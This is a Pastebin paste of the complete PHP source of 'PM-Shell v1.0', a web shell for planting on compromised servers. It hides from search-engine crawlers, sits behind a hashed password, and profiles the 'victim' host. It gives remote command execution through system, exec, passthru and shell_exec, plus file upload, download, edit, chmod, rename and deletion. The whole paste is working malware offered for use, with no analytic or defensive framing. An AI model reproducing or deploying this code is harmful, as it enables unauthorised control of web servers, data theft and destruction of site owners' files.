yonata21

PM-Shell_v1.php

Jan 10th, 2018
966
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5.  
  6. $auth_pass = "776aaf189d504481af2b3535716f2305"; // default: ./Mruw4x21
  7. $color = "#00ff00";
  8. $default_action = 'FilesMan';
  9. $default_use_ajax = true;
  10. $default_charset = 'UTF-8';
  11. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  13.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  14.         header('HTTP/1.0 404 Not Found');
  15.         exit;
  16.     }
  17. }
  18.  
  19. function login_shell() {
  20. ?>
  21. <html>
  22. <head>
  23. <link href='http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif' rel='SHORTCUT ICON'/>
  24. <title>MShell Mr.Uw4X</title>
  25. <style type="text/css">
  26. html {
  27.     margin: 20px auto;
  28.     background: #000000;
  29.     color: blue;
  30.     text-align: center;
  31. }
  32. header {
  33.     color: blue;
  34.     margin: 10px auto;
  35. }
  36. input[type=password] {
  37.     width: 250px;
  38.     height: 25px;
  39.     color: white;
  40.     background: #000000;
  41.     border: 1px solid blue;
  42.     padding: 5px;
  43.     margin-left: 20px;
  44.     text-align: center;
  45. }
  46. </style>
  47. </head>
  48. <center>
  49. <header>
  50.     <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
  51.     <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Ubuntu">PM-Shell v1.0</font><br>
  52.     <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
  53. <form method="post">
  54. <input type="password" name="pass">
  55. </form>
  56. <?php
  57. exit;
  58. }
  59. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  60.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  61.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  62.     else
  63.         login_shell();
  64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  65.     @ob_clean();
  66.     $file = $_GET['file'];
  67.     header('Content-Description: File Transfer');
  68.     header('Content-Type: application/octet-stream');
  69.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  70.     header('Expires: 0');
  71.     header('Cache-Control: must-revalidate');
  72.     header('Pragma: public');
  73.     header('Content-Length: ' . filesize($file));
  74.     readfile($file);
  75.     exit;
  76. }
  77. //password until here
  78. ?>
  79. <?php
  80. if(get_magic_quotes_gpc()){
  81. foreach($_POST as $key=>$value){
  82. $_POST[$key] = stripslashes($value);
  83. }
  84. }
  85. echo '<!DOCTYPE HTML>
  86. <html>
  87. <head>
  88. <link href="ttp://i48.servimg.com/u/f48/16/08/07/74/indone10.gif" rel="HORTCUT ICON">
  89. <link href="" rel="stylesheet" type="text/css">
  90. <title>MShell Mr.Uw4X</title>
  91. <style>
  92. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  93. @import url(http://fonts.googleapis.com/css?family=Wallpoet);
  94. body{
  95. font-family: "Ubuntu";
  96. font-size: 13px;
  97. background-color: black;
  98. color:white;
  99. }
  100. #content tr:hover{
  101. background-color: #000;
  102. color: #191970;
  103. text-shadow:4px 4px 10px #0000ff;
  104. }
  105. #content .first{
  106. background-color: #191970;
  107. }
  108. table{
  109. border: 0px #000000 solid;
  110. }
  111. a{
  112. color:white;
  113. text-decoration: none;
  114. }
  115. a:hover{
  116. color:blue;
  117. text-shadow:0px 0px 10px #000070;
  118. }
  119. input{
  120. background: #000;
  121. color: #fff;
  122. -moz-border-radius: 5px;
  123. border-radius:5px;}
  124.  
  125. select,textarea{
  126. border: 1px #191970 solid;
  127. background: #000000;
  128. color: #fff;
  129. -moz-border-radius: 5px;
  130. -webkit-border-radius:5px;
  131. border-radius:5px;
  132. }
  133. </style>
  134. </head>
  135. <body>
  136. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
  137. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
  138. echo '<tr>';
  139. //Starting About victim
  140. $kernel = php_uname();
  141. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  142. /*fuction hdd*/
  143. if(!function_exists('posix_getegid')) {
  144.     $user = @get_current_user();
  145.     $uid = @getmyuid();
  146.     $gid = @getmygid();
  147.     $group = "?";
  148. } else {
  149.     $uid = @posix_getpwuid(posix_geteuid());
  150.     $gid = @posix_getgrgid(posix_getegid());
  151.     $user = $uid['name'];
  152.     $uid = $uid['uid'];
  153.     $group = $gid['name'];
  154.     $gid = $gid['gid'];
  155. }
  156. $freespace = hdd(disk_free_space("/"));
  157. /*Code hdd*/
  158. $total = hdd(disk_total_space("/"));
  159. $used = $total - $freespace;
  160. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  161. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  162. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  163. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  164. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  165. /*code wget python perl*/
  166. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  167. $ds = @ini_get("disable_functions");
  168. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  169. if(!function_exists('posix_getegid')) {
  170.     $user = @get_current_user();
  171.     $uid = @getmyuid();
  172.     $gid = @getmygid();
  173.     $group = "?";
  174. } else {
  175.     $uid = @posix_getpwuid(posix_geteuid());
  176.     $gid = @posix_getgrgid(posix_getegid());
  177.     $user = $uid['name'];
  178.     $uid = $uid['uid'];
  179.     $group = $gid['name'];
  180.     $gid = $gid['gid'];
  181. }
  182. //eksekusi
  183. echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Priv-Min Shell Mr.Uw4X</font><br>";
  184. echo "System: <font color=blue>".$kernel."</font><br>";
  185. echo "Safe Mode: $sm<br>";
  186. echo "Disable Functions: $show_ds<br>";
  187. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
  188. echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
  189. echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  190. echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
  191. //ending about victim
  192. //starting home bar
  193. echo "<ul>";
  194. echo "<center>[ <a href='?'>Home</a> ] [ <a href='?dir=$dir&do=cmd'>Console</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
  195. echo "</ul>";
  196. //fuction menu bar
  197. if($_GET['do'] == 'cmd') {
  198.     echo "<form method='post'>
  199.     <font style='color: #00f;'>".$user."@".$ip.": ~ $ </font>
  200.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='Enter'>
  201.     </form>";
  202.     if($_POST['do_cmd']) {
  203.         echo "<pre>".exe($_POST['cmd'])."</pre>";
  204.     }
  205. } elseif($_GET['logout'] == true) {
  206.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  207.     echo "<script>window.location='?';</script>";
  208. }
  209. //ending home bar
  210. echo '</tr>';
  211. echo '<tr><td><font color="blue">Current Dir :</font> ';
  212.  
  213. //Code Menu
  214. if(isset($_GET['path'])){
  215. $path = $_GET['path'];
  216. }else{
  217. $path = getcwd();
  218. }
  219. $path = str_replace('\\','/',$path);
  220. $paths = explode('/',$path);
  221.  
  222. foreach($paths as $id=>$pat){
  223. if($pat == '' && $id == 0){
  224. $a = true;
  225. echo '<a href="?path=/">/</a>';
  226. continue;
  227. }
  228. if($pat == '') continue;
  229. echo '<a href="?path=';
  230. for($i=0;$i<=$id;$i++){
  231. echo "$paths[$i]";
  232. if($i != $id) echo "/";
  233. }
  234. echo '">'.$pat.'</a>/';
  235. }
  236. echo '</td></tr><tr><td><center>';
  237. if(isset($_FILES['file'])){
  238. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  239. echo '<center><font color="blue">Upload Success</font><br /></center>';
  240. }else{
  241. echo '<center><font color="red">Upload Failed</font><br/></center>';
  242. }
  243. }
  244. echo '<form enctype="multipart/form-data" method="POST">
  245. <font color="white">File Upload :</font> <input type="file" name="file" />
  246. <input type="submit" value="upload" />
  247. </form>
  248. </center></td></tr>';
  249. if(isset($_GET['filesrc'])){
  250. echo "<tr><td>Current File : ";
  251. echo $_GET['filesrc'];
  252. echo '</tr></td></table><br />';
  253. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  254. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  255. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  256. if($_POST['opt'] == 'chmod'){
  257. if(isset($_POST['perm'])){
  258. if(chmod($_POST['path'],$_POST['perm'])){
  259. echo '<font color="blue">Set Permission Success</font><br/>';
  260. }else{
  261. echo '<font color="red">Set Permission Failed</font><br />';
  262. }
  263. }
  264. echo '<form method="POST">
  265. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  266. <input type="hidden" name="path" value="'.$_POST['path'].'">
  267. <input type="hidden" name="opt" value="chmod">
  268. <input type="submit" value="Go" />
  269. </form>';
  270. }elseif($_POST['opt'] == 'rename'){
  271. if(isset($_POST['newname'])){
  272. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  273. echo '<font color="blue">Ganti Nama Success</font><br/>';
  274. }else{
  275. echo '<font color="red">Ganti Nama Failed</font><br />';
  276. }
  277. $_POST['name'] = $_POST['newname'];
  278. }
  279. echo '<form method="POST">
  280. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  281. <input type="hidden" name="path" value="'.$_POST['path'].'">
  282. <input type="hidden" name="opt" value="rename">
  283. <input type="submit" value="Go" />
  284. </form>';
  285. } elseif($_POST['opt'] == 'edit'){
  286. if(isset($_POST['src'])){
  287. $fp = fopen($_POST['path'],'w');
  288. if(fwrite($fp,$_POST['src'])){
  289. echo '<font color="blue">Success Edit File</font><br/>';
  290. }else{
  291. echo '<font color="red">Failed Edit File</font><br/>';
  292. }
  293. fclose($fp);
  294. }
  295. echo '<form method="POST">
  296. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  297. <input type="hidden" name="path" value="'.$_POST['path'].'">
  298. <input type="hidden" name="opt" value="edit">
  299. <input type="submit" value="Save" />
  300. </form>';
  301. }
  302. echo '</center>';
  303. }else{
  304. echo '</table><br/><center>';
  305. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  306. if($_POST['type'] == 'dir'){
  307. if(rmdir($_POST['path'])){
  308. echo '<font color="blue">Directory Terhapus</font><br/>';
  309. }else{
  310. echo '<font color="red">Directory Failed Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
  311. }
  312. }elseif($_POST['type'] == 'file'){
  313. if(unlink($_POST['path'])){
  314. echo '<font color="blue">File Terhapus</font><br/>';
  315. }else{
  316. echo '<font color="red">File Failed Dihapus</font><br/>';
  317. }
  318. }
  319. }
  320. echo '</center>';
  321. $scandir = scandir($path);
  322. echo '<div id="content"><table width="1250" border="0" cellpadding="3" cellspacing="1" align="center">
  323. <tr class="first">
  324. <td><center>Name</peller></center></td>
  325. <td><center>Type</peller></center></td>
  326. <td><center>Last Modify</peller></center></td>
  327. <td><center>Owner/Group</peller></center></td>
  328. <td><center>Size</peller></center></td>
  329. <td><center>Permission</peller></center></td>
  330. <td><center>Action</peller></center></td>
  331. </tr>';
  332. //For Code Column Directory
  333. foreach($scandir as $dir){
  334. $dtype = filetype("$dir/$dirx");
  335. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  336. if(function_exists('posix_getpwuid')) {
  337.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  338.                     $downer = $downer['name'];
  339.                 } else {
  340.                     //$downer = $uid;
  341.                     $downer = fileowner("$dir/$dirx");
  342.                 }
  343.                 if(function_exists('posix_getgrgid')) {
  344.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  345.                     $dgrp = $dgrp['name'];
  346.                 } else {
  347.                     $dgrp = filegroup("$dir/$dirx");
  348.                 }
  349. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  350. echo '<tr>
  351. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>';
  352. echo "<td><center>$dtype</center></td>";
  353. echo "<td><center>$dtime</center></td>";
  354. echo "<td><center>$downer/$dgrp</center></td>";
  355. echo "<td><center>--</center></td>
  356. <td><center>";
  357. if(is_writable($path.'/'.$dir)) echo '<font color="blue">';
  358. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  359. echo perms($path.'/'.$dir);
  360. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  361.  
  362. echo '</center></td>
  363. <td><center><form method="POST" action="?option&path='.$path.'">
  364. <select name="opt">
  365. <option value="delete">Delete</option>
  366. <option value="chmod">Chmod</option>
  367. <option value="rename">Rename</option>
  368. </select>
  369. <input type="hidden" name="type" value="dir">
  370. <input type="hidden" name="name" value="'.$dir.'">
  371. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  372. <input type="submit" value="GO">
  373. </form></center></td>
  374. </tr>';
  375. }
  376. //Code For File Column
  377. foreach($scandir as $file){
  378. $ftype = filetype("$path/$file");
  379. $ftime = date("F d Y g:i:s", filemtime("$path/$file"));
  380. if(function_exists('posix_getpwuid')) {
  381.                 $fowner = @posix_getpwuid(fileowner("$path/$file"));
  382.                 $fowner = $fowner['name'];
  383.             } else {
  384.                 //$downer = $uid;
  385.                 $fowner = fileowner("$path/$file");
  386.             }
  387.             if(function_exists('posix_getgrgid')) {
  388.                 $fgrp = @posix_getgrgid(filegroup("$path/$file"));
  389.                 $fgrp = $fgrp['name'];
  390.             } else {
  391.                 $fgrp = filegroup("$path/$file");
  392.             }
  393. if(!is_file($path.'/'.$file)) continue;
  394. $size = filesize($path.'/'.$file)/1024;
  395. $size = round($size,3);
  396. if($size >= 1024){
  397. $size = round($size/1024,2).' MB';
  398. }else{
  399. $size = $size.' KB';
  400. }
  401.  
  402. echo '<tr>
  403. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
  404. echo "<td><center>$ftype</center></td>";
  405. echo "<td><center>$ftime</center></td>";
  406. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  407. echo "<td><center>$size</center></td>
  408. <td><center>";
  409. if(is_writable($path.'/'.$file)) echo '<font color="blue">';
  410. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  411. echo perms($path.'/'.$file);
  412. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  413. echo '</center></td>
  414. <td><center><form method="POST" action="?option&path='.$path.'">
  415. <select name="opt">
  416. <option value="delete">Delete</option>
  417. <option value="chmod">Chmod</option>
  418. <option value="rename">Rename</option>
  419. <option value="edit">Edit</option>
  420. </select>
  421. <input type="hidden" name="type" value="file">
  422. <input type="hidden" name="name" value="'.$file.'">
  423. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  424. <input type="submit" value="GO">
  425. </form></center></td>
  426. </tr>';
  427. }
  428. echo '</table>
  429. </div>';
  430. }
  431. echo "<center><hr width=280 color=#191970>Copyright &copy; ".date("Y")." - <a href='https://s1.postimg.org/3i7tcvdrbj/Shade.png'><font color=blue>Mr.Uw4X</font></a></center>
  432. </body>
  433. </html>";
  434. //Function Code HDD + exe
  435. function hdd($s) {
  436.     if($s >= 1073741824)
  437.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  438.     elseif($s >= 1048576)
  439.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  440.     elseif($s >= 1024)
  441.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  442.     else
  443.     return $s .' B';
  444. }
  445. function exe($cmd) {
  446.     if(function_exists('system')) {        
  447.         @ob_start();       
  448.         @system($cmd);     
  449.         $buff = @ob_get_contents();        
  450.         @ob_end_clean();       
  451.         return $buff;  
  452.     } elseif(function_exists('exec')) {        
  453.         @exec($cmd,$results);      
  454.         $buff = "";        
  455.         foreach($results as $result) {         
  456.             $buff .= $result;      
  457.         } return $buff;    
  458.     } elseif(function_exists('passthru')) {        
  459.         @ob_start();       
  460.         @passthru($cmd);       
  461.         $buff = @ob_get_contents();        
  462.         @ob_end_clean();       
  463.         return $buff;  
  464.     } elseif(function_exists('shell_exec')) {      
  465.         $buff = @shell_exec($cmd);     
  466.         return $buff;  
  467.     }
  468. }
  469. function perms($file){
  470. $perms = fileperms($file);
  471.  
  472. if (($perms & 0xC000) == 0xC000) {
  473. // Socket
  474. $info = 's';
  475. } elseif (($perms & 0xA000) == 0xA000) {
  476. // Symbolic Link
  477. $info = 'l';
  478. } elseif (($perms & 0x8000) == 0x8000) {
  479. // Regular
  480. $info = '-';
  481. } elseif (($perms & 0x6000) == 0x6000) {
  482. // Block special
  483. $info = 'b';
  484. } elseif (($perms & 0x4000) == 0x4000) {
  485. // Directory
  486. $info = 'd';
  487. } elseif (($perms & 0x2000) == 0x2000) {
  488. // Character special
  489. $info = 'c';
  490. } elseif (($perms & 0x1000) == 0x1000) {
  491. // FIFO pipe
  492. $info = 'p';
  493. } else {
  494. // Unknown
  495. $info = 'u';
  496. }
  497.  
  498. // Owner
  499. $info .= (($perms & 0x0100) ? 'r' : '-');
  500. $info .= (($perms & 0x0080) ? 'w' : '-');
  501. $info .= (($perms & 0x0040) ?
  502. (($perms & 0x0800) ? 's' : 'x' ) :
  503. (($perms & 0x0800) ? 'S' : '-'));
  504.  
  505. // Group
  506. $info .= (($perms & 0x0020) ? 'r' : '-');
  507. $info .= (($perms & 0x0010) ? 'w' : '-');
  508. $info .= (($perms & 0x0008) ?
  509. (($perms & 0x0400) ? 's' : 'x' ) :
  510. (($perms & 0x0400) ? 'S' : '-'));
  511.  
  512. // World
  513. $info .= (($perms & 0x0004) ? 'r' : '-');
  514. $info .= (($perms & 0x0002) ? 'w' : '-');
  515. $info .= (($perms & 0x0001) ?
  516. (($perms & 0x0200) ? 't' : 'x' ) :
  517. (($perms & 0x0200) ? 'T' : '-'));
  518.  
  519. return $info;
  520. }
  521. ?>
RAW Paste Data